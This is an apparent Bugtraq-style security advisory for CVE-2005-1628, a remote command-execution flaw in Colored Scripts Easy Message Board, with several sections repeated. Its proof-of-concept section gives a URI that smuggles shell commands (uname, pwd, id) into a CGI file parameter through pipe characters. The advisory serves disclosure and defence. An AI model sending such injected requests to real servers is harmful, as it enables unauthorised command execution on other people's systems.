Colored Scripts Easy Message Board Remote Command Execution Vulnerability
BID:13637
Info
Colored Scripts Easy Message Board Remote Command Execution Vulnerability
| Bugtraq ID: | 13637 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-1628 |
| Remote: | Yes |
| Local: | No |
| Published: | May 16 2005 12:00AM |
| Updated: | Jul 03 2007 07:57PM |
| Credit: | Status-x <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
Colored Scripts Easy Message Board |
| Not Vulnerable: | |
Discussion
Colored Scripts Easy Message Board Remote Command Execution Vulnerability
Colored Scripts Easy Message Board is prone to a remote command-execution vulnerability because it fails to properly sanitize user-supplied input.
Colored Scripts Easy Message Board is prone to a remote command-execution vulnerability because it fails to properly sanitize user-supplied input.
Exploit / POC
Colored Scripts Easy Message Board Remote Command Execution Vulnerability
No exploit is required.
The following proof-of-concept URI is available:
http://www.example.com/cgi-bin/mods/apage/apage.cgi?f=file.htm.|uname -a;pwd;id|
No exploit is required.
The following proof-of-concept URI is available:
http://www.example.com/cgi-bin/mods/apage/apage.cgi?f=file.htm.|uname -a;pwd;id|
Solution / Fix
Colored Scripts Easy Message Board Remote Command Execution Vulnerability
Solution:
Reportedly, this vulnerability is addressed in the latest version of the product. Symantec has not confirmed this.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Reportedly, this vulnerability is addressed in the latest version of the product. Symantec has not confirmed this.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
Colored Scripts Easy Message Board Remote Command Execution Vulnerability
References:
References:
- Easy Message Board (Colored Scripts)
- Web-app.org WebAPP Home Page (Web-app.org)
- Application orders Linux in WebAPP v0.9.9.2.1 ([email protected])
- Easy Message Board Directory Traversal and Remote Command (SoulBlack Group
)